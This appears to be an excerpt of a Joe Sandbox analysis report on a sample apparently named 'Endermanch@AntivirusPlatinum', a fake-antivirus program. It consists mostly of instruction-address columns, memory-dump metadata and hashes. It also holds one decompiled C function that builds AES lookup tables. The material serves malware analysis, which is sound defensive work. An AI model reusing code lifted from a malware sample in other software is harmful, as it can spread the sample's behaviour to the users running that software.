                                                                                                                                                              0x004082ea
                                                                                                                                                              0x004082ea
                                                                                                                                                              0x004082ec
                                                                                                                                                              0x004082ec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082ec
                                                                                                                                                              0x004082d8
                                                                                                                                                              0x004082da
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082dc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082dc
                                                                                                                                                              0x004082cb
                                                                                                                                                              0x004082cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082f8
                                                                                                                                                              0x004082f8
                                                                                                                                                              0x004082f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082c0
                                                                                                                                                              0x00407e30
                                                                                                                                                              0x004081e2
                                                                                                                                                              0x004081e5
                                                                                                                                                              0x004081e8
                                                                                                                                                              0x004081ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004081f3
                                                                                                                                                              0x004081f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004081ff
                                                                                                                                                              0x00408202
                                                                                                                                                              0x00408205
                                                                                                                                                              0x00408207
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408211
                                                                                                                                                              0x00408211
                                                                                                                                                              0x00408212
                                                                                                                                                              0x00408215
                                                                                                                                                              0x0040821e
                                                                                                                                                              0x0040821e
                                                                                                                                                              0x00408221
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408223
                                                                                                                                                              0x00408229
                                                                                                                                                              0x0040822b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040822d
                                                                                                                                                              0x0040822d
                                                                                                                                                              0x0040822d
                                                                                                                                                              0x00408236
                                                                                                                                                              0x00408239
                                                                                                                                                              0x0040823a
                                                                                                                                                              0x00408240
                                                                                                                                                              0x00408242
                                                                                                                                                              0x00408245
                                                                                                                                                              0x00408247
                                                                                                                                                              0x0040824b
                                                                                                                                                              0x00408254
                                                                                                                                                              0x00408259
                                                                                                                                                              0x0040825c
                                                                                                                                                              0x00408270
                                                                                                                                                              0x0040827b
                                                                                                                                                              0x0040827b
                                                                                                                                                              0x0040825c
                                                                                                                                                              0x00408280
                                                                                                                                                              0x00408283
                                                                                                                                                              0x00408286
                                                                                                                                                              0x00408286
                                                                                                                                                              0x0040828b
                                                                                                                                                              0x0040828b
                                                                                                                                                              0x0040828f
                                                                                                                                                              0x00408290
                                                                                                                                                              0x00408290
                                                                                                                                                              0x00408290
                                                                                                                                                              0x00408290
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408295
                                                                                                                                                              0x00407e39
                                                                                                                                                              0x004080c7
                                                                                                                                                              0x004080cd
                                                                                                                                                              0x004080d0
                                                                                                                                                              0x004080d3
                                                                                                                                                              0x004080d6
                                                                                                                                                              0x004080d9
                                                                                                                                                              0x004080dc
                                                                                                                                                              0x004080df
                                                                                                                                                              0x004080e2
                                                                                                                                                              0x004080e5
                                                                                                                                                              0x004080eb
                                                                                                                                                              0x004080f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004080f6
                                                                                                                                                              0x004080f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004080fe
                                                                                                                                                              0x004080fe
                                                                                                                                                              0x004080fe
                                                                                                                                                              0x00408104
                                                                                                                                                              0x00408107
                                                                                                                                                              0x00408107
                                                                                                                                                              0x0040810a
                                                                                                                                                              0x0040810e
                                                                                                                                                              0x00408111
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408117
                                                                                                                                                              0x0040811d
                                                                                                                                                              0x00408120
                                                                                                                                                              0x00408127
                                                                                                                                                              0x0040812a
                                                                                                                                                              0x0040812a
                                                                                                                                                              0x0040812b
                                                                                                                                                              0x0040812e
                                                                                                                                                              0x0040812e
                                                                                                                                                              0x00408132
                                                                                                                                                              0x0040818a
                                                                                                                                                              0x0040818a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040818a
                                                                                                                                                              0x00408134
                                                                                                                                                              0x00408137
                                                                                                                                                              0x0040813b
                                                                                                                                                              0x00408143
                                                                                                                                                              0x00408151
                                                                                                                                                              0x00408162
                                                                                                                                                              0x00408166
                                                                                                                                                              0x0040816e
                                                                                                                                                              0x00408171
                                                                                                                                                              0x00408174
                                                                                                                                                              0x0040817b
                                                                                                                                                              0x0040817b
                                                                                                                                                              0x0040817e
                                                                                                                                                              0x00408185
                                                                                                                                                              0x00408180
                                                                                                                                                              0x00408180
                                                                                                                                                              0x00408180
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040817e
                                                                                                                                                              0x00408176
                                                                                                                                                              0x00408179
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040818d
                                                                                                                                                              0x00408195
                                                                                                                                                              0x00408198
                                                                                                                                                              0x0040819c
                                                                                                                                                              0x0040819f
                                                                                                                                                              0x004081a2
                                                                                                                                                              0x004081a5
                                                                                                                                                              0x004081a5
                                                                                                                                                              0x004081a5
                                                                                                                                                              0x004081a8
                                                                                                                                                              0x004081a8
                                                                                                                                                              0x004081ad
                                                                                                                                                              0x004081ad
                                                                                                                                                              0x004081b0
                                                                                                                                                              0x004081b3
                                                                                                                                                              0x004081b3
                                                                                                                                                              0x004081c0
                                                                                                                                                              0x004081c3
                                                                                                                                                              0x004081d6
                                                                                                                                                              0x004081d6
                                                                                                                                                              0x004081d8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004081c8
                                                                                                                                                              0x004081cc
                                                                                                                                                              0x004081cf
                                                                                                                                                              0x004081d3
                                                                                                                                                              0x004081d3
                                                                                                                                                              0x004081d3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004081da
                                                                                                                                                              0x00407e42
                                                                                                                                                              0x00407f01
                                                                                                                                                              0x00407f04
                                                                                                                                                              0x00407f07
                                                                                                                                                              0x00407f0a
                                                                                                                                                              0x00407f0d
                                                                                                                                                              0x00407f10
                                                                                                                                                              0x00407f13
                                                                                                                                                              0x00407f16
                                                                                                                                                              0x00407f19
                                                                                                                                                              0x00407f1f
                                                                                                                                                              0x00407f25
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407f2b
                                                                                                                                                              0x00407f2d
                                                                                                                                                              0x00407f2f
                                                                                                                                                              0x00407f32
                                                                                                                                                              0x00407f38
                                                                                                                                                              0x004080aa
                                                                                                                                                              0x004080aa
                                                                                                                                                              0x004080aa
                                                                                                                                                              0x004080ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407f6b
                                                                                                                                                              0x00407f76
                                                                                                                                                              0x00407f78
                                                                                                                                                              0x00407f80
                                                                                                                                                              0x00407f91
                                                                                                                                                              0x00407f96
                                                                                                                                                              0x00407f99
                                                                                                                                                              0x00407fa5
                                                                                                                                                              0x00407fad
                                                                                                                                                              0x00407fb2
                                                                                                                                                              0x00407fbd
                                                                                                                                                              0x00407fc0
                                                                                                                                                              0x00407fc4
                                                                                                                                                              0x00407fc7
                                                                                                                                                              0x00407fcf
                                                                                                                                                              0x00407fdd
                                                                                                                                                              0x00407feb
                                                                                                                                                              0x00407ff8
                                                                                                                                                              0x00408004
                                                                                                                                                              0x00408011
                                                                                                                                                              0x0040801c
                                                                                                                                                              0x0040801f
                                                                                                                                                              0x00408022
                                                                                                                                                              0x00408026
                                                                                                                                                              0x0040809e
                                                                                                                                                              0x004080a1
                                                                                                                                                              0x004080a4
                                                                                                                                                              0x004080a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408028
                                                                                                                                                              0x00408028
                                                                                                                                                              0x0040802b
                                                                                                                                                              0x0040802f
                                                                                                                                                              0x00408032
                                                                                                                                                              0x00408032
                                                                                                                                                              0x00408032
                                                                                                                                                              0x00408041
                                                                                                                                                              0x00408041
                                                                                                                                                              0x00408044
                                                                                                                                                              0x00408045
                                                                                                                                                              0x00408048
                                                                                                                                                              0x00408033
                                                                                                                                                              0x00408033
                                                                                                                                                              0x00408037
                                                                                                                                                              0x00408039
                                                                                                                                                              0x0040803b
                                                                                                                                                              0x0040803d
                                                                                                                                                              0x0040803f
                                                                                                                                                              0x0040803f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040804a
                                                                                                                                                              0x0040804c
                                                                                                                                                              0x0040804c
                                                                                                                                                              0x0040804d
                                                                                                                                                              0x00408095
                                                                                                                                                              0x00408099
                                                                                                                                                              0x0040809b
                                                                                                                                                              0x0040809b
                                                                                                                                                              0x0040809b
                                                                                                                                                              0x0040809b
                                                                                                                                                              0x0040804f
                                                                                                                                                              0x0040804f
                                                                                                                                                              0x0040804f
                                                                                                                                                              0x00408050
                                                                                                                                                              0x0040808a
                                                                                                                                                              0x0040808e
                                                                                                                                                              0x00408090
                                                                                                                                                              0x00408090
                                                                                                                                                              0x00408052
                                                                                                                                                              0x00408052
                                                                                                                                                              0x00408052
                                                                                                                                                              0x00408053
                                                                                                                                                              0x0040807f
                                                                                                                                                              0x00408083
                                                                                                                                                              0x00408085
                                                                                                                                                              0x00408085
                                                                                                                                                              0x00408055
                                                                                                                                                              0x00408055
                                                                                                                                                              0x00408055
                                                                                                                                                              0x00408056
                                                                                                                                                              0x00408074
                                                                                                                                                              0x00408078
                                                                                                                                                              0x0040807a
                                                                                                                                                              0x0040807a
                                                                                                                                                              0x00408058
                                                                                                                                                              0x00408058
                                                                                                                                                              0x00408058
                                                                                                                                                              0x00408059
                                                                                                                                                              0x00408069
                                                                                                                                                              0x0040806d
                                                                                                                                                              0x0040806f
                                                                                                                                                              0x0040806f
                                                                                                                                                              0x0040805b
                                                                                                                                                              0x0040805b
                                                                                                                                                              0x0040805c
                                                                                                                                                              0x0040805e
                                                                                                                                                              0x00408062
                                                                                                                                                              0x00408064
                                                                                                                                                              0x00408064
                                                                                                                                                              0x00408062
                                                                                                                                                              0x0040805c
                                                                                                                                                              0x00408059
                                                                                                                                                              0x00408056
                                                                                                                                                              0x00408053
                                                                                                                                                              0x00408050
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040804d
                                                                                                                                                              0x00408048
                                                                                                                                                              0x00408026
                                                                                                                                                              0x004080b3
                                                                                                                                                              0x004080b6
                                                                                                                                                              0x004080b9
                                                                                                                                                              0x004080bc
                                                                                                                                                              0x00407f3a
                                                                                                                                                              0x00407f3d
                                                                                                                                                              0x00407f3d
                                                                                                                                                              0x00407f3f
                                                                                                                                                              0x00407f46
                                                                                                                                                              0x00407f49
                                                                                                                                                              0x00407f4c
                                                                                                                                                              0x00407f4f
                                                                                                                                                              0x00407f52
                                                                                                                                                              0x00407f55
                                                                                                                                                              0x00407f58
                                                                                                                                                              0x00407f5d
                                                                                                                                                              0x00407f60
                                                                                                                                                              0x00407f64
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407f64
                                                                                                                                                              0x004080c2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407f32
                                                                                                                                                              0x00407e4b
                                                                                                                                                              0x00407ea6
                                                                                                                                                              0x00407ea9
                                                                                                                                                              0x00407eaf
                                                                                                                                                              0x00407eb1
                                                                                                                                                              0x00407eb4
                                                                                                                                                              0x00407eb7
                                                                                                                                                              0x00407ebd
                                                                                                                                                              0x00407ec3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407ec9
                                                                                                                                                              0x00407ecc
                                                                                                                                                              0x00407ece
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407ed4
                                                                                                                                                              0x00407ed4
                                                                                                                                                              0x00407ed7
                                                                                                                                                              0x00407ed9
                                                                                                                                                              0x00407eed
                                                                                                                                                              0x00407eed
                                                                                                                                                              0x00407eef
                                                                                                                                                              0x00407edd
                                                                                                                                                              0x00407ee0
                                                                                                                                                              0x00407ee3
                                                                                                                                                              0x00407ee4
                                                                                                                                                              0x00407ee7
                                                                                                                                                              0x00407ee7
                                                                                                                                                              0x00407eea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407eea
                                                                                                                                                              0x00407ef1
                                                                                                                                                              0x00407ef4
                                                                                                                                                              0x00407ef7
                                                                                                                                                              0x00407ef7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407ed4
                                                                                                                                                              0x00407e50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407e56
                                                                                                                                                              0x00407e59
                                                                                                                                                              0x00407e5b
                                                                                                                                                              0x00407e63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407e6b
                                                                                                                                                              0x00407e8d
                                                                                                                                                              0x00407e92
                                                                                                                                                              0x00407e98
                                                                                                                                                              0x00407e9b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e6d
                                                                                                                                                              0x00407e70
                                                                                                                                                              0x00407e73
                                                                                                                                                              0x00407e77
                                                                                                                                                              0x00407e79
                                                                                                                                                              0x00407e7c
                                                                                                                                                              0x00407e80
                                                                                                                                                              0x00407e82
                                                                                                                                                              0x00407e82
                                                                                                                                                              0x00407e80
                                                                                                                                                              0x00407e85
                                                                                                                                                              0x00407e88
                                                                                                                                                              0x00407e89
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                              • Instruction ID: a767dd345aae43465a873efd591c8ff9a8f9b96ad8d492f56da380bf2bc35be0
                                                                                                                                                              • Opcode Fuzzy Hash: 793eb8acfe7b56b9e0e2ffda27fff7268e03f0766cdb39e56d671b486faabcc2
                                                                                                                                                              • Instruction Fuzzy Hash: 00F18E31D006099FCB14CFA9C5845AEBBB1FF49314F24857FD996B7282DB38A941CB89
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E00409DE0() {
                                                                                                                                                              				signed char _v8;
                                                                                                                                                              				char _v521;
                                                                                                                                                              				signed int _t98;
                                                                                                                                                              				signed int _t100;
                                                                                                                                                              				signed int _t102;
                                                                                                                                                              				signed char _t105;
                                                                                                                                                              				signed char _t106;
                                                                                                                                                              				char _t107;
                                                                                                                                                              				void* _t108;
                                                                                                                                                              				signed char _t119;
                                                                                                                                                              				signed int _t120;
                                                                                                                                                              				signed int _t129;
                                                                                                                                                              				signed char* _t155;
                                                                                                                                                              				signed int _t156;
                                                                                                                                                              				signed int _t161;
                                                                                                                                                              				signed int _t162;
                                                                                                                                                              				signed int _t163;
                                                                                                                                                              				signed int _t164;
                                                                                                                                                              				signed int _t181;
                                                                                                                                                              				signed int _t182;
                                                                                                                                                              				void* _t183;
                                                                                                                                                              
                                                                                                                                                              				_t107 = 0;
                                                                                                                                                              				_t98 = 1;
                                                                                                                                                              				do {
                                                                                                                                                              					 *(_t183 + _t107 - 0x304) = _t98;
                                                                                                                                                              					 *(_t183 + _t107 - 0x205) = _t98;
                                                                                                                                                              					 *((char*)(_t183 + _t98 - 0x104)) = _t107;
                                                                                                                                                              					_t107 = _t107 + 1;
                                                                                                                                                              					asm("sbb edx, edx");
                                                                                                                                                              					_t98 = _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b ^ _t98 + _t98;
                                                                                                                                                              				} while (_t98 != 1);
                                                                                                                                                              				_t108 = 0;
                                                                                                                                                              				do {
                                                                                                                                                              					asm("sbb edx, edx");
                                                                                                                                                              					 *(_t108 + 0x418ca8) = _t98;
                                                                                                                                                              					_t98 = _t98 + _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b;
                                                                                                                                                              					_t108 = _t108 + 1;
                                                                                                                                                              				} while (_t108 < 0x1e);
                                                                                                                                                              				_t105 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				L6:
                                                                                                                                                              				L6:
                                                                                                                                                              				if(_t105 == 0) {
                                                                                                                                                              					_t100 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t100 =  *( &_v521 - ( *(_t183 + (_t105 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				_t119 = (_t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100)) >> 0x00000008 ^ _t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) ^ 0x00000063;
                                                                                                                                                              				_t102 = _t105 * 4;
                                                                                                                                                              				_t16 = _t102 + 0x417ca8; // 0x417ca8
                                                                                                                                                              				_t155 = _t16;
                                                                                                                                                              				 *(_t105 + 0x418dc8) = _t119;
                                                                                                                                                              				_t155[1] = _t119;
                                                                                                                                                              				 *_t155 = _t119;
                                                                                                                                                              				 *(_t102 + 0x4180ab) = _t119;
                                                                                                                                                              				 *(_t102 + 0x4180a8) = _t119;
                                                                                                                                                              				 *(_t102 + 0x4184ab) = _t119;
                                                                                                                                                              				 *(_t102 + 0x4184aa) = _t119;
                                                                                                                                                              				 *(_t102 + 0x4188aa) = _t119;
                                                                                                                                                              				 *(_t102 + 0x4188a9) = _t119;
                                                                                                                                                              				if(_t119 == 0) {
                                                                                                                                                              					_t156 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t156 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t102 + 0x417cab) = _t156;
                                                                                                                                                              				 *(_t102 + 0x4180aa) = _t156;
                                                                                                                                                              				 *(_t102 + 0x4184a9) = _t156;
                                                                                                                                                              				 *(_t102 + 0x4188a8) = _t156;
                                                                                                                                                              				if(_t119 == 0) {
                                                                                                                                                              					_t120 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t120 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t102 + 0x417caa) = _t120;
                                                                                                                                                              				 *(_t102 + 0x4180a9) = _t120;
                                                                                                                                                              				 *(_t102 + 0x4184a8) = _t120;
                                                                                                                                                              				 *(_t102 + 0x4188ab) = _t120;
                                                                                                                                                              				_t181 = _t105 & 0x000000ff;
                                                                                                                                                              				if((((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) ^ 0x00000005) == 0) {
                                                                                                                                                              					_t106 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t106 =  *((intOrPtr*)( &_v521 - ( *(_t183 + (((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 & 0x000000ff ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
                                                                                                                                                              				}
                                                                                                                                                              				 *(_v8 + 0x418cc8) = _t106;
                                                                                                                                                              				if(_t106 == 0) {
                                                                                                                                                              					_t161 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t161 =  *(_t183 + ( *(_t183 + (_t106 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				_t182 = _t106 & 0x000000ff;
                                                                                                                                                              				_t129 = _t182 << 2;
                                                                                                                                                              				 *(_t102 + 0x416caa) = _t161;
                                                                                                                                                              				 *(_t102 + 0x4170a9) = _t161;
                                                                                                                                                              				 *(_t102 + 0x4174a8) = _t161;
                                                                                                                                                              				 *(_t102 + 0x4178ab) = _t161;
                                                                                                                                                              				 *(_t129 + 0x415caa) = _t161;
                                                                                                                                                              				 *(_t129 + 0x4160a9) = _t161;
                                                                                                                                                              				 *(_t129 + 0x4164a8) = _t161;
                                                                                                                                                              				 *(_t129 + 0x4168ab) = _t161;
                                                                                                                                                              				if(_t106 == 0) {
                                                                                                                                                              					_t162 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t162 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t102 + 0x416ca8) = _t162;
                                                                                                                                                              				 *(_t102 + 0x4170ab) = _t162;
                                                                                                                                                              				 *(_t102 + 0x4174aa) = _t162;
                                                                                                                                                              				 *(_t102 + 0x4178a9) = _t162;
                                                                                                                                                              				 *(_t129 + 0x415ca8) = _t162;
                                                                                                                                                              				 *(_t129 + 0x4160ab) = _t162;
                                                                                                                                                              				 *(_t129 + 0x4164aa) = _t162;
                                                                                                                                                              				 *(_t129 + 0x4168a9) = _t162;
                                                                                                                                                              				if(_t106 == 0) {
                                                                                                                                                              					_t163 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t163 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t102 + 0x416ca9) = _t163;
                                                                                                                                                              				 *(_t102 + 0x4170a8) = _t163;
                                                                                                                                                              				 *(_t102 + 0x4174ab) = _t163;
                                                                                                                                                              				 *(_t102 + 0x4178aa) = _t163;
                                                                                                                                                              				 *(_t129 + 0x415ca9) = _t163;
                                                                                                                                                              				 *(_t129 + 0x4160a8) = _t163;
                                                                                                                                                              				 *(_t129 + 0x4164ab) = _t163;
                                                                                                                                                              				 *(_t129 + 0x4168aa) = _t163;
                                                                                                                                                              				if(_t106 == 0) {
                                                                                                                                                              					_t164 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t164 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = _v8 + 1;
                                                                                                                                                              				 *(_t102 + 0x416cab) = _t164;
                                                                                                                                                              				 *(_t102 + 0x4170aa) = _t164;
                                                                                                                                                              				 *(_t102 + 0x4174a9) = _t164;
                                                                                                                                                              				 *(_t102 + 0x4178a8) = _t164;
                                                                                                                                                              				 *(_t129 + 0x415cab) = _t164;
                                                                                                                                                              				 *(_t129 + 0x4160aa) = _t164;
                                                                                                                                                              				 *(_t129 + 0x4164a9) = _t164;
                                                                                                                                                              				 *(_t129 + 0x4168a8) = _t164;
                                                                                                                                                              				if(_v8 < 0x100) {
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              				return _t102;
                                                                                                                                                              				L5:
                                                                                                                                                              				_t105 = _v8;
                                                                                                                                                              				goto L6;
                                                                                                                                                              			}
























                                                                                                                                                              0x00409ded
                                                                                                                                                              0x00409def
                                                                                                                                                              0x00409df6
                                                                                                                                                              0x00409dfe
                                                                                                                                                              0x00409e05
                                                                                                                                                              0x00409e0c
                                                                                                                                                              0x00409e13
                                                                                                                                                              0x00409e16
                                                                                                                                                              0x00409e1f
                                                                                                                                                              0x00409e21
                                                                                                                                                              0x00409e26
                                                                                                                                                              0x00409e29
                                                                                                                                                              0x00409e33
                                                                                                                                                              0x00409e35
                                                                                                                                                              0x00409e3f
                                                                                                                                                              0x00409e41
                                                                                                                                                              0x00409e42
                                                                                                                                                              0x00409e47
                                                                                                                                                              0x00409e49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409e51
                                                                                                                                                              0x00409e53
                                                                                                                                                              0x00409e6d
                                                                                                                                                              0x00409e55
                                                                                                                                                              0x00409e68
                                                                                                                                                              0x00409e68
                                                                                                                                                              0x00409e87
                                                                                                                                                              0x00409e8a
                                                                                                                                                              0x00409e91
                                                                                                                                                              0x00409e91
                                                                                                                                                              0x00409e97
                                                                                                                                                              0x00409e9d
                                                                                                                                                              0x00409ea0
                                                                                                                                                              0x00409ea2
                                                                                                                                                              0x00409ea8
                                                                                                                                                              0x00409eae
                                                                                                                                                              0x00409eb4
                                                                                                                                                              0x00409eba
                                                                                                                                                              0x00409ec0
                                                                                                                                                              0x00409ec6
                                                                                                                                                              0x00409edd
                                                                                                                                                              0x00409ec8
                                                                                                                                                              0x00409ed3
                                                                                                                                                              0x00409ed3
                                                                                                                                                              0x00409edf
                                                                                                                                                              0x00409ee5
                                                                                                                                                              0x00409eeb
                                                                                                                                                              0x00409ef1
                                                                                                                                                              0x00409ef9
                                                                                                                                                              0x00409f10
                                                                                                                                                              0x00409efb
                                                                                                                                                              0x00409f06
                                                                                                                                                              0x00409f06
                                                                                                                                                              0x00409f12
                                                                                                                                                              0x00409f18
                                                                                                                                                              0x00409f1e
                                                                                                                                                              0x00409f24
                                                                                                                                                              0x00409f2a
                                                                                                                                                              0x00409f45
                                                                                                                                                              0x00409f79
                                                                                                                                                              0x00409f47
                                                                                                                                                              0x00409f75
                                                                                                                                                              0x00409f75
                                                                                                                                                              0x00409f7e
                                                                                                                                                              0x00409f86
                                                                                                                                                              0x00409f9d
                                                                                                                                                              0x00409f88
                                                                                                                                                              0x00409f93
                                                                                                                                                              0x00409f93
                                                                                                                                                              0x00409f9f
                                                                                                                                                              0x00409fa4
                                                                                                                                                              0x00409fa7
                                                                                                                                                              0x00409fad
                                                                                                                                                              0x00409fb3
                                                                                                                                                              0x00409fb9
                                                                                                                                                              0x00409fbf
                                                                                                                                                              0x00409fc5
                                                                                                                                                              0x00409fcb
                                                                                                                                                              0x00409fd1
                                                                                                                                                              0x00409fd9
                                                                                                                                                              0x00409fed
                                                                                                                                                              0x00409fdb
                                                                                                                                                              0x00409fe3
                                                                                                                                                              0x00409fe3
                                                                                                                                                              0x00409fef
                                                                                                                                                              0x00409ff5
                                                                                                                                                              0x00409ffb
                                                                                                                                                              0x0040a001
                                                                                                                                                              0x0040a007
                                                                                                                                                              0x0040a00d
                                                                                                                                                              0x0040a013
                                                                                                                                                              0x0040a019
                                                                                                                                                              0x0040a021
                                                                                                                                                              0x0040a035
                                                                                                                                                              0x0040a023
                                                                                                                                                              0x0040a02b
                                                                                                                                                              0x0040a02b
                                                                                                                                                              0x0040a037
                                                                                                                                                              0x0040a03d
                                                                                                                                                              0x0040a043
                                                                                                                                                              0x0040a049
                                                                                                                                                              0x0040a04f
                                                                                                                                                              0x0040a055
                                                                                                                                                              0x0040a05b
                                                                                                                                                              0x0040a061
                                                                                                                                                              0x0040a069
                                                                                                                                                              0x0040a07d
                                                                                                                                                              0x0040a06b
                                                                                                                                                              0x0040a073
                                                                                                                                                              0x0040a073
                                                                                                                                                              0x0040a07f
                                                                                                                                                              0x0040a089
                                                                                                                                                              0x0040a08f
                                                                                                                                                              0x0040a095
                                                                                                                                                              0x0040a09b
                                                                                                                                                              0x0040a0a1
                                                                                                                                                              0x0040a0a7
                                                                                                                                                              0x0040a0ad
                                                                                                                                                              0x0040a0b3
                                                                                                                                                              0x0040a0b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040a0c2
                                                                                                                                                              0x00409e4e
                                                                                                                                                              0x00409e4e
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
